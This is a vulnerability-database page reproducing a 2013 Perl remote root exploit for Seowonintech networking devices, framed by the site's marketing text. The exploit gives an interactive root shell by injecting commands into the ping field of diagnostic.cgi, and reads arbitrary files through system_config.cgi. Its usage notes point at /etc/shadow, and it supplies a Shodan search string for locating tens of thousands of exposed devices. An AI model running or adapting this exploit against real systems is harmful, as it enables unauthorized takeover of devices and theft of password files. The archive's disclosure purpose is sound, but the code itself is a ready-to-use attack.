Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Seowonintech Remote Root

🗓️ 22 Jun 2013 00:00:00Reported by Todor DonevType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 36 Views

Seowonintech all device remote root exploit v2, allowing attacker to get root access on seowonintech hardware. Exploiting via remote command execution and file disclosure release

Code
`#!/usr/bin/perl  
#   
# [+] Seowonintech all device remote root exploit v2  
# =====================================================  
# author: | email:  
# Todor Donev (latin) | todor dot donev   
# Òîäîð Äîíåâ (cyrillic) | @googlemail.com   
# =====================================================  
# type: | platform: | description:  
# remote | linux | attacker can get root  
# hardware | seowonintech | access on the device  
# =====================================================  
# greetings to:  
# Stiliyan Angelov,Tsvetelina Emirska,all elite   
# colleagues and all my friends that support me.   
# =====================================================  
# warning:  
# Results about 37665 possible vulnerabilities  
# from this exploit.  
# =====================================================  
# shodanhq dork:   
# thttpd/2.25b 29dec2003 Content-Length: 386 Date: 2013  
# =====================================================  
# P.S. Sorry for buggy perl.. :)  
# 2o13 Hell yeah from Bulgaria, Sofia  
#  
# Stop Monsanto Stop Monsanto Stop Monsanto  
#  
# FREE GOTTFRID SVARTHOLM WARG FREE  
# GOTTFRID SVARTHOLM WARG is THEPIRATEBAY co-founder   
# who was sentenced to two years in jail by Nacka   
# district court, Sweden on 18.06.2013 for hacking into  
# computers at a company that manages data for Swedish  
# authorities and making illegal online money transfers.  
  
use LWP::Simple qw/$ua get/;  
my $host = $ARGV[0] =~ /^http:\/\// ? $ARGV[0]: 'http://' . $ARGV[0];  
if(not defined $ARGV[0])  
{  
usg();  
exit;  
}  
print "[+] Seowonintech all device remote root exploit\n";  
$diagcheck = $host."/cgi-bin/diagnostic.cgi";  
$syscheck = $host."/cgi-bin/system_config.cgi";  
$res = $ua->get($diagcheck) || die "[-] Error: $!\n";  
print "[+] Checking before attack..\n";  
if($res->status_line != 200){  
print "[+] diagnostic.cgi Status: ".$res->status_line."\n";  
}else{  
print "[o] Victim is ready for attack.\n";  
print "[o] Status: ".$res->status_line."\n";   
if(defined $res =~ m{selected>4</option>}sx){  
print "[+] Connected to $ARGV[0]\n";  
print "[+] The fight for the future Begins\n";  
print "[+] Exploiting via remote command execution..\n";  
print "[+] Permission granted, old friend.\n";  
&rce;  
}else{  
print "[!] Warning: possible vulnerability.\n";  
exit;  
}   
}  
$res1 = $ua->get($syscheck) || die "[-] Error: $!\n";  
if($res1->status_line != 200){  
print "[+] system_config.cgi Status: ".$res1->status_line."\n";  
exit;  
}else{  
print "[+] Trying to attack via remote file disclosure release.\n";  
if(defined $syscheck =~ s/value=\'\/etc\/\'//gs){  
print "[+] Victim is ready for attack.\n";  
print "[+] Connected to $ARGV[0]\n";  
print "[o] Follow the white cat.\n";  
print "[+] Exploiting via remote file dislocure..\n";  
print "[+] You feeling lucky, Neo?\n";  
&rfd;  
}else{  
print "[!] Warning: Possible vulnerability. Believe the unbelievable!\n";  
exit;  
}  
}  
sub rfd{  
while(1){   
print "# cat ";  
chomp($file=<STDIN>);  
if($file eq ""){ print "Enter full path to file!\n"; }  
$bug = $host."/cgi-bin/system_config.cgi?file_name=".$file."&btn_type=load&action=APPLY";  
$data=get($bug) || die "[-] Error: $ARGV[0] $!\n";  
$data =~ s/Null/File not found!/gs;  
if (defined $data =~ m{rows="30">(.*?)</textarea>}sx){  
print $1."\n";  
}  
}  
}  
sub rce{  
while(1){   
print "# ";  
chomp($rce=<STDIN>);  
$bug = $host."/cgi-bin/diagnostic.cgi?select_mode_ping=on&ping_ipaddr=-q -s 0 127.0.0.1;".$rce.";&ping_count=1&action=Apply&html_view=ping";  
$rce =~ s/\|/\;/;  
if($rce eq ""){print "enter Linux command\n";}  
if($rce eq "clear"){system $^O eq 'MSWin32' ? 'cls' : 'clear';}  
if($rce eq "exit" || $rce eq "quit"){print "There is no spoon...\n"; exit;}  
$data=get($bug) || die "[-] Error: $!\n";  
if (defined $data =~ m{(\s.*) Content-type:}sx){  
$result = substr $1, index($1, ' loss') or substr $1, index($1, ' ms');  
$result =~ s/ loss\n//;   
$result =~ s/ ms\n//;  
print $result;  
}  
}  
}  
sub usg  
{  
print " [+] Seowonintech all device remote root exploit\n";  
print " [!] by Todor Donev todor dot donev @ googlemail.com\n";  
print " [?] usg: perl $0 <victim>\n";  
print " [?] exmp xpl USG: perl $0 192.168.1.1 :)\n";  
print " [1] exmp xpl RCE: # uname -a :)\n";  
print " [2] exmp xpl RFD: # cat /etc/webpasswd or /etc/shadow, maybe and /etc/passwd :P\n";  
}  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
22 Jun 2013 00:00Current
7.4High risk
Vulners AI Score7.4
seowonintechremote accessexploitremote command executionfile disclosurevulnerabilityexploitationroot accesshardwarelinux
36